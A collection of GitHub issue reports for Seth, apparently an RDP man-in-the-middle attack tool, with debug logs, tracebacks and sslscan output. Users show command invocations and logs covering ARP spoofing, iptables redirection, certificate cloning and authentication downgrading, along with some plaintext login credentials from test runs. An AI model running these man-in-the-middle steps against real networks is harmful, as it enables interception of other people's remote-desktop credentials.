                    35:8c:36:c2:df:7f:4e:55:f6:31:21:7d:4f:c8:dc:
                    d0:dc:22:10:41:f2:32:23:6e:b9:95:4b:8f:59:d1:
                    ca:64:4f:76:15:c5:69:52:73:a8:90:64:36:f8:d1:
                    44:f5:54:7b:de:66:68:68:a2:98:0a:3e:40:63:90:
                    95:48:b3:b8:b3:31:9a:2d:ec:35:81:61:57:a2:d7:
                    f0:45
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                5D:AC:95:A3:4B:6C:67:2C:E1:77:8C:C6:42:E3:7E:A7:65:42:8D:82
            X509v3 Authority Key Identifier: 
                keyid:5D:AC:95:A3:4B:6C:67:2C:E1:77:8C:C6:42:E3:7E:A7:65:42:8D:82

            X509v3 Basic Constraints: 
                CA:TRUE
    Signature Algorithm: sha256WithRSAEncryption
         a8:f7:47:ff:cc:e3:db:f2:fa:a1:d3:58:e1:9b:88:cb:e7:f0:
         13:b8:78:dc:a9:62:1f:c7:a7:ad:c7:c4:86:ed:cd:49:7a:0b:
         27:c7:c2:4a:11:d2:27:a5:4c:0c:17:20:38:72:6f:9f:fa:10:
         ea:ab:50:8a:2b:8c:a8:d9:fa:d9:a0:4f:fe:3f:8d:40:cc:a7:
         20:2a:fd:2e:61:58:b0:f0:71:c5:0e:a5:74:2f:5f:20:7e:8c:
         16:5b:5b:1f:10:7e:90:22:0a:5f:8a:65:74:1c:1c:aa:1e:e1:
         2d:37:7f:80:a1:de:b2:db:57:de:e2:d2:cf:06:2e:1c:1c:77:
         a7:1b:6c:da:dc:0e:58:fe:94:a1:4f:d4:02:48:64:7d:f8:b7:
         e1:a8:5a:38:c1:e9:c2:80:8b:36:c7:25:0a:06:57:3a:35:fb:
         0d:a6:20:5f:7a:c0:2c:af:ad:52:c4:e0:8b:40:11:dd:7d:94:
         fc:23:51:5d:89:ee:59:c4:85:e3:7c:64:3e:32:64:02:37:ac:
         31:44:31:e3:e6:33:a7:78:27:60:59:98:b5:e4:36:16:dd:b5:
         1f:e9:17:ae:06:ec:dc:5b:52:41:8d:df:88:32:0c:59:cc:74:
         b4:61:8a:77:16:1e:af:b4:74:89:27:90:12:fa:8b:6f:c6:a7:
         15:6d:72:9d
-----BEGIN CERTIFICATE-----
MIIC8TCCAdmgAwIBAgIJALAfmbV+jwXNMA0GCSqGSIb3DQEBCwUAMA8xDTALBgNV
BAMMBFhSRFAwHhcNMTkwMjAxMDAzNzE2WhcNMjkwMTMxMDAzNzE2WjAPMQ0wCwYD
VQQDDARYUkRQMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0lBl4LuH
HqarZsO7UgP1+HikTPgDfH2QyWroEV+TlvF7MxE24fUcswwCWTRKcCpJORGQHnz5
+37qG15AA9rDn51eY4x5+bXlToV9fUuyzp2rvJL1YUoKCddHKhKN5BY+lrtR41nA
24it890g8qOUUpOXGeyRBoV82esS7gEZwle5ROEmTQIP8C8hLwVDAfGObE9UIJ3P
f4V9VUNNpjaqXyxqCncI2iu+lmpUjQOUehDyhyw1jDbC339OVfYxIX1PyNzQ3CIQ
QfIyI265lUuPWdHKZE92FcVpUnOokGQ2+NFE9VR73mZoaKKYCj5AY5CVSLO4szGa
Lew1gWFXotfwRQIDAQABo1AwTjAdBgNVHQ4EFgQUXayVo0tsZyzhd4zGQuN+p2VC
jYIwHwYDVR0jBBgwFoAUXayVo0tsZyzhd4zGQuN+p2VCjYIwDAYDVR0TBAUwAwEB
/zANBgkqhkiG9w0BAQsFAAOCAQEAqPdH/8zj2/L6odNY4ZuIy+fwE7h43KliH8en
rcfEhu3NSXoLJ8fCShHSJ6VMDBcgOHJvn/oQ6qtQiiuMqNn62aBP/j+NQMynICr9
LmFYsPBxxQ6ldC9fIH6MFltbHxB+kCIKX4pldBwcqh7hLTd/gKHesttX3uLSzwYu
HBx3pxts2twOWP6UoU/UAkhkffi34ahaOMHpwoCLNsclCgZXOjX7DaYgX3rALK+t
UsTgi0AR3X2U/CNRXYnuWcSF43xkPjJkAjesMUQx4+Yzp3gnYFmYteQ2Ft21H+kX
rgbs3FtSQY3fiDIMWcx0tGGKdxYer7R0iSeQEvqLb8anFW1ynQ==
-----END CERTIFICATE-----

Where the error comes from

I assume that the certificate is causing clone-cert.sh to error out after the received certificate is piped to line 60:

openssl s_client -servername "$SERVER" \
    -connect "$HOST" < /dev/null 2>&1 | \
    openssl x509 -outform PEM -out "$ORIG_CERT_FILE"

And I assume that the error is the reason for seth.sh to choose the OR option at line 123, thereby creating a self-signed cert.

CERT_KEY="$($SCRIPT_DIR/clone-cert.sh "$ORIGINAL_DEST:3389" || \ 
    create_self_signed_cert "$ORIGINAL_DEST")"

Output you might ask for

Unfortunately I can't trace the problem beyond those two lines. Below is the output of the command you asked for in issue #1. Mine seems rather different than what the OP received from his server:

$ openssl s_client -connect ██.██.██.205:3389 < /dev/null
CONNECTED(00000003)
139739288069184:error:1408F10B:SSL routines:ssl3_get_record:wrong version number:../ssl/record/ssl3_record.c:332:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 5 bytes and written 283 bytes
Verification: OK
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 0 (ok)
---

One problem or two?

In addition to the error described above, my 'victim' RDP client is not able to connect to the RDP server. On the victim host I've tried using rdesktop and krdc. The latter is one of the many clients that is built on top of xfreerdp. I would expect the latter to validate the (forged) certificate, as you mentioned in your excellent paper. But neither RDP client is able to establish a connection to the RDP server.

By the way, thank you for this very cool and useful tool!

will this work against a different subnet:
ie.

attacker IP 10.10.5.23
victim IP 10.10.110.65

Thanks

Help.
It does not work, it does the ARP poisoning correctly.
Is there something I'm forgetting to set up ??.
Please provide more information, I'm just running ./seth.sh ...
Thank you!

:~/GitHub/Seth# ./seth.sh eth0 192.168.1.14 192.168.1.15 192.168.1.1
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.1.13
[] Clone the x509 certificate of the original destination...
[] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Waiting for connection

These cases work:

Debug Log (Windows 7 Client 6.3.9600 rdp 8.1) (Server Windows 10 10.0.14393 + NLA) (Login: admin / admin123456) -> https://pastebin.com/A9RNLEKx

Server 2008 R2 6.1.7601 Certificate TLSv1 + AES128-SHA:
Debug Log (Client Windows 7 / 10) -> https://pastebin.com/SWbUEEK4

(Server Windows 2008 R2 6.1.7601 NO NLA Certificate TLSv1 + AES128-SHA Login
Debug Log (Windows 7 / 10 Client) chris1:remoteuser!123456 ) -> https://pastebin.com/K8S6Mz36

These do not:

Server Windows 10 10 10.0.14393 Certificate TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384:
Debug Log (Windows 10 Client 10.0.10586 rdp 10.0) (Server Windows 10 10.0.14393 + NLA) (Login: admin / admin123456) -> https://pastebin.com/pGPMxemG

Server Windows 2012 R2 6.3.9600 TLSv1.2 + ECDHE-RSA-AES256-SHA384:
Debug Log (Client Windows 7 / 10 Login: Administrator / admin-123456) -> https://pastebin.com/Ar8Lb8pK

Using this tool, is there any way to attack multiple targets at once, simultaneously?

Currently there a lot of "false positives", i.e. key press events are being reported when there are none.

I can't connect to server from victim.
I have issue about Broken pipe when run_fake_server

Traceback (most recent call last):
  File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
    self.run()
  File "/root/Seth/seth/main.py", line 42, in run
    self.run_fake_server()
  File "/root/Seth/seth/main.py", line 87, in run_fake_server
    (id, id)))
  File "/usr/lib/python3.5/ssl.py", line 861, in send
    return self._sslobj.write(data)
  File "/usr/lib/python3.5/ssl.py", line 586, in write
    return self._sslobj.write(data)
BrokenPipeError: [Errno 32] Broken pipe

Any one help me know my issue?

Hi Adrian,

This attack is not working in my scenario. I have Kali as an attacker 192.168.1.31, Windows 10 as Victim 192.168.1.21 and Server 2012 as a host 192.168.1.11. Please be informed that My Windows 10 and Server 2012 are in Domain environment. Below is the debug error and command I ran. Highly appreciate your help.

===================================================================
root@kali:~/tools/Seth# SETH_DEBUG=1 ./seth.sh eth1 192.168.1.{31,21,11}
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.1.11
[] Clone the x509 certificate of the original destination...
unable to load certificate
139625035678784:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[] Adjust the iptables rule for all packets...
[] Run RDP proxy...
Listening for new connection
Connection received from 192.168.1.21:49788
Warning: RC4 not available on client, attack might not work
From client:
00000000: 03 00 00 2F 2A E0 00 00 00 00 00 43 6F 6F 6B 69 .../......Cooki
00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 4D 49 43 52 e: mstshash=MICR
Listening for new connection
00000020: 4F 53 4F 46 54 0D 0A 01 00 08 00 0B 00 00 00 OSOFT..........
Downgrading authentication options from 11 to 3
From client: (modified)
00000000: 03 00 00 2F 2A E0 00 00 00 00 00 43 6F 6F 6B 69 .../*......Cooki
00000010: 65 3A 20 6D 73 74 73 68 61 73 68 3D 4D 49 43 52 e: mstshash=MICR
00000020: 4F 53 4F 46 54 0D 0A 01 00 08 00 03 00 00 00 OSOFT..........
From server:
00000000: 03 00 00 13 0E D0 00 00 12 34 00 02 0F 08 00 02 .........4......
00000010: 00 00 00 ...
Enable SSL
Connection lost
Connection lost (file descriptor cannot be a negative integer (-1))
Connection lost (file descriptor cannot be a negative integer (-1))
Connection lost (file descriptor cannot be a negative integer (-1))
Connection lost (file descriptor cannot be a negative integer (-1))

===================================================================
root@kali:~/tools/Seth# sslscan 192.168.1.11:3389
Version: 1.11.13-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 192.168.1.11

Testing SSL server 192.168.1.11 on port 3389 using SNI name 192.168.1.11

TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

TLS renegotiation:
Secure session renegotiation supported

TLS Compression:
Compression disabled

Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

Supported Server Cipher(s):
Preferred TLSv1.2 128 bits AES128-SHA256
Accepted TLSv1.2 128 bits AES128-SHA
Accepted TLSv1.2 256 bits AES256-SHA256
Accepted TLSv1.2 256 bits AES256-SHA
Accepted TLSv1.2 128 bits RC4-SHA
Accepted TLSv1.2 112 bits DES-CBC3-SHA
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.2 128 bits RC4-MD5
Preferred TLSv1.1 128 bits AES128-SHA
Accepted TLSv1.1 256 bits AES256-SHA
Accepted TLSv1.1 128 bits RC4-SHA
Accepted TLSv1.1 112 bits DES-CBC3-SHA
Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.1 128 bits RC4-MD5
Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5

SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 2048

Subject: SERVER2012.microsofts.com
Issuer: SERVER2012.microsofts.com

Not valid before: Jul 4 16:34:43 2019 GMT
Not valid after: Jan 3 16:34:43 2020 GMT

===================================================================
root@kali:~/tools/Seth# openssl ciphers -v
TLS_AES_256_GCM_SHA384 TLSv1.3 Kx=any Au=any Enc=AESGCM(256) Mac=AEAD
TLS_CHACHA20_POLY1305_SHA256 TLSv1.3 Kx=any Au=any Enc=CHACHA20/POLY1305(256) Mac=AEAD
TLS_AES_128_GCM_SHA256 TLSv1.3 Kx=any Au=any Enc=AESGCM(128) Mac=AEAD
ECDHE-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH Au=ECDSA Enc=AESGCM(256) Mac=AEAD
ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(256) Mac=AEAD
DHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=DH Au=RSA Enc=AESGCM(256) Mac=AEAD
ECDHE-ECDSA-CHACHA20-POLY1305 TLSv1.2 Kx=ECDH Au=ECDSA Enc=CHACHA20/POLY1305(256) Mac=AEAD
ECDHE-RSA-CHACHA20-POLY1305 TLSv1.2 Kx=ECDH Au=RSA Enc=CHACHA20/POLY1305(256) Mac=AEAD
DHE-RSA-CHACHA20-POLY1305 TLSv1.2 Kx=DH Au=RSA Enc=CHACHA20/POLY1305(256) Mac=AEAD
ECDHE-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=ECDSA Enc=AESGCM(128) Mac=AEAD
ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AESGCM(128) Mac=AEAD
DHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=DH Au=RSA Enc=AESGCM(128) Mac=AEAD
ECDHE-ECDSA-AES256-SHA384 TLSv1.2 Kx=ECDH Au=ECDSA Enc=AES(256) Mac=SHA384
ECDHE-RSA-AES256-SHA384 TLSv1.2 Kx=ECDH Au=RSA Enc=AES(256) Mac=SHA384
DHE-RSA-AES256-SHA256 TLSv1.2 Kx=DH Au=RSA Enc=AES(256) Mac=SHA256
ECDHE-ECDSA-AES128-SHA256 TLSv1.2 Kx=ECDH Au=ECDSA Enc=AES(128) Mac=SHA256
ECDHE-RSA-AES128-SHA256 TLSv1.2 Kx=ECDH Au=RSA Enc=AES(128) Mac=SHA256
DHE-RSA-AES128-SHA256 TLSv1.2 Kx=DH Au=RSA Enc=AES(128) Mac=SHA256
ECDHE-ECDSA-AES256-SHA TLSv1 Kx=ECDH Au=ECDSA Enc=AES(256) Mac=SHA1
ECDHE-RSA-AES256-SHA TLSv1 Kx=ECDH Au=RSA Enc=AES(256) Mac=SHA1
DHE-RSA-AES256-SHA SSLv3 Kx=DH Au=RSA Enc=AES(256) Mac=SHA1
ECDHE-ECDSA-AES128-SHA TLSv1 Kx=ECDH Au=ECDSA Enc=AES(128) Mac=SHA1
ECDHE-RSA-AES128-SHA TLSv1 Kx=ECDH Au=RSA Enc=AES(128) Mac=SHA1
DHE-RSA-AES128-SHA SSLv3 Kx=DH Au=RSA Enc=AES(128) Mac=SHA1
RSA-PSK-AES256-GCM-SHA384 TLSv1.2 Kx=RSAPSK Au=RSA Enc=AESGCM(256) Mac=AEAD
DHE-PSK-AES256-GCM-SHA384 TLSv1.2 Kx=DHEPSK Au=PSK Enc=AESGCM(256) Mac=AEAD
RSA-PSK-CHACHA20-POLY1305 TLSv1.2 Kx=RSAPSK Au=RSA Enc=CHACHA20/POLY1305(256) Mac=AEAD
DHE-PSK-CHACHA20-POLY1305 TLSv1.2 Kx=DHEPSK Au=PSK Enc=CHACHA20/POLY1305(256) Mac=AEAD
ECDHE-PSK-CHACHA20-POLY1305 TLSv1.2 Kx=ECDHEPSK Au=PSK Enc=CHACHA20/POLY1305(256) Mac=AEAD
AES256-GCM-SHA384 TLSv1.2 Kx=RSA Au=RSA Enc=AESGCM(256) Mac=AEAD
PSK-AES256-GCM-SHA384 TLSv1.2 Kx=PSK Au=PSK Enc=AESGCM(256) Mac=AEAD
PSK-CHACHA20-POLY1305 TLSv1.2 Kx=PSK Au=PSK Enc=CHACHA20/POLY1305(256) Mac=AEAD
RSA-PSK-AES128-GCM-SHA256 TLSv1.2 Kx=RSAPSK Au=RSA Enc=AESGCM(128) Mac=AEAD
DHE-PSK-AES128-GCM-SHA256 TLSv1.2 Kx=DHEPSK Au=PSK Enc=AESGCM(128) Mac=AEAD
AES128-GCM-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AESGCM(128) Mac=AEAD
PSK-AES128-GCM-SHA256 TLSv1.2 Kx=PSK Au=PSK Enc=AESGCM(128) Mac=AEAD
AES256-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA256
AES128-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA256
ECDHE-PSK-AES256-CBC-SHA384 TLSv1 Kx=ECDHEPSK Au=PSK Enc=AES(256) Mac=SHA384
ECDHE-PSK-AES256-CBC-SHA TLSv1 Kx=ECDHEPSK Au=PSK Enc=AES(256) Mac=SHA1
SRP-RSA-AES-256-CBC-SHA SSLv3 Kx=SRP Au=RSA Enc=AES(256) Mac=SHA1
SRP-AES-256-CBC-SHA SSLv3 Kx=SRP Au=SRP Enc=AES(256) Mac=SHA1
RSA-PSK-AES256-CBC-SHA384 TLSv1 Kx=RSAPSK Au=RSA Enc=AES(256) Mac=SHA384
DHE-PSK-AES256-CBC-SHA384 TLSv1 Kx=DHEPSK Au=PSK Enc=AES(256) Mac=SHA384
RSA-PSK-AES256-CBC-SHA SSLv3 Kx=RSAPSK Au=RSA Enc=AES(256) Mac=SHA1
DHE-PSK-AES256-CBC-SHA SSLv3 Kx=DHEPSK Au=PSK Enc=AES(256) Mac=SHA1
AES256-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA1
PSK-AES256-CBC-SHA384 TLSv1 Kx=PSK Au=PSK Enc=AES(256) Mac=SHA384
PSK-AES256-CBC-SHA SSLv3 Kx=PSK Au=PSK Enc=AES(256) Mac=SHA1
ECDHE-PSK-AES128-CBC-SHA256 TLSv1 Kx=ECDHEPSK Au=PSK Enc=AES(128) Mac=SHA256
ECDHE-PSK-AES128-CBC-SHA TLSv1 Kx=ECDHEPSK Au=PSK Enc=AES(128) Mac=SHA1
SRP-RSA-AES-128-CBC-SHA SSLv3 Kx=SRP Au=RSA Enc=AES(128) Mac=SHA1
SRP-AES-128-CBC-SHA SSLv3 Kx=SRP Au=SRP Enc=AES(128) Mac=SHA1
RSA-PSK-AES128-CBC-SHA256 TLSv1 Kx=RSAPSK Au=RSA Enc=AES(128) Mac=SHA256
DHE-PSK-AES128-CBC-SHA256 TLSv1 Kx=DHEPSK Au=PSK Enc=AES(128) Mac=SHA256
RSA-PSK-AES128-CBC-SHA SSLv3 Kx=RSAPSK Au=RSA Enc=AES(128) Mac=SHA1
DHE-PSK-AES128-CBC-SHA SSLv3 Kx=DHEPSK Au=PSK Enc=AES(128) Mac=SHA1
AES128-SHA SSLv3 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA1
PSK-AES128-CBC-SHA256 TLSv1 Kx=PSK Au=PSK Enc=AES(128) Mac=SHA256
PSK-AES128-CBC-SHA SSLv3 Kx=PSK Au=PSK Enc=AES(128) Mac=SHA1

Hi Adrian,

Thank you for develop this type of tool. You have done great work.
I am facing issue when entering the correct credentials i am not able to get RDP and because of this i am bot able to execute cmd like calc.

Error:

.\Lenovo:[email protected]
Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/root/Seth/seth/main.py", line 47, in run
self.forward_data()
File "/root/Seth/seth/main.py", line 172, in forward_data
self.save_vars(parse_rdp(data, self.vars, From=From))
File "/root/Seth/seth/main.py", line 185, in save_vars
print_var(k, self.vars)
File "/root/Seth/seth/parsing.py", line 445, in print_var
KBD_LAYOUT_CNTRY[vars[k]])
KeyError: 16393

Commands:
./seth.sh eth0 192.168.11.54 192.168.11.58 192.168.11.53 calc

Please help

Adrian,
I get this error after a connection has been created: (This is off of a Kali box)

[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 10.5.190.84
[] Clone the x509 certificate of the original destination...
unable to load certificate
140399066473536:error:0909006C:PEM routines:get_name:no start line:../crypto/pem/pem_lib.c:745:Expecting: TRUSTED CERTIFICATE
[!] Failed to clone certificate, create bogus self-signed certificate...
[] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 10.5.6.69:18437
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Connection lost
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 917, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 54, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 170, in forward_data
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
ValueError: file descriptor cannot be a negative integer (-1)

Connection received from 10.5.6.69:18563
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
Connection lost
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.7/threading.py", line 917, in _bootstrap_inner
self.run()
File "/opt/Seth/seth/main.py", line 54, in run
self.forward_data()
File "/opt/Seth/seth/main.py", line 170, in forward_data
readable, _, _ = select.select([self.lsock, self.rsock], [], [])
ValueError: file descriptor cannot be a negative integer (-1)

root@kali:~/soft/Seth-master# SETH_DEBUG=1 ./seth.sh wlan1 192.168.1.{2,4,3}
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.1.3
[] Clone the x509 certificate of the original destination...
[] Adjust the iptables rule for all packets...
[] Run RDP proxy...
Listening for new connection
Connection received from 192.168.1.4:50100
From client:
00000000: 03 00 00 13 0E E0 00 00 00 00 00 01 00 08 00 03 ................
00000010: 00 00 00 ...
Listening for new connection
From server:
00000000: 03 00 00 13 0E D0 00 00 12 34 00 02 01 08 00 02 .........4......
00000010: 00 00 00 ...
Enable SSL
Not using RC4-SHA because of SSL Error: ('No cipher can be selected.',)
From client:
00000000: 30 37 A0 03 02 01 02 A1 30 30 2E 30 2C A0 2A 04 07......00.0,..
00000010: 28 4E 54 4C 4D 53 53 50 00 01 00 00 00 B7 82 08 (NTLMSSP........
00000020: E2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000030: 00 06 01 B1 1D 00 00 00 0F .........
TLS alert internal error received, make sure to use RC4-SHA

root@kali:~/soft/Seth-master# sslscan 192.168.1.3:3389
Version: 1.11.11-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 192.168.1.3

Testing SSL server 192.168.1.3 on port 3389 using SNI name 192.168.1.3

TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

TLS renegotiation:
Secure session renegotiation supported

TLS Compression:
Compression disabled

Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

Supported Server Cipher(s):
Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5

SSL Certificate:
Signature Algorithm: sha1WithRSAEncryption
RSA Key Strength: 2048

Subject: Net-PC2
Issuer: Net-PC2

Not valid before: Sep 29 17:07:54 2018 GMT
Not valid after: Mar 31 17:07:54 2019 GMT

After "connection received" and "downgrading authentication";

[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.2.106
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Waiting for connection
Connection received from 192.168.2.111
Downgrading authentication options from 11 to 3
Enable SSL
SSLError: [SSL: TLSV1_ALERT_INTERNAL_ERROR] tlsv1 alert internal error (_ssl.c:2090)
Waiting for connection
|

I want to know how to run seth in windows.

Hi AV,

I am trying to run seth with below command getting the error "something went wrong while parsing the output of tcpdump".

./seth.sh inet 192.168.10.20 192.168.10.138

192.168.10.20 - Attacker's IP
192.168.10.138 - Victim's IP.

I am running Kali 2018.1 build ( 64 bit)

Can you please help me out with this issue.

Thanks,
Dhruva

Win X client, Server 2008 R2 server.

Interestingly, if I use the IP instead of the domain name, I get issue #17 instead. On rare occasions, this will 'work', and I get issue #17 again.

(With debug:)

[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is ****
[] Clone the x509 certificate of the original destination...
[] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Warning: The python3 module 'hexdump' is missing. Using hexlify instead.
Listening for new connection
Connection received from ****:34673
From client:

Listening for new connection
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/root/src/Seth/seth/main.py", line 37, in run
self.handle_protocol_negotiation()
File "/root/src/Seth/seth/main.py", line 100, in handle_protocol_negotiation
self.save_vars({"RDP_PROTOCOL_OLD": data[-4]})
IndexError: index out of range

This would suggest that the socket read on line 98 is returning no data. Confirmed with a print(len(data)) check.

See #8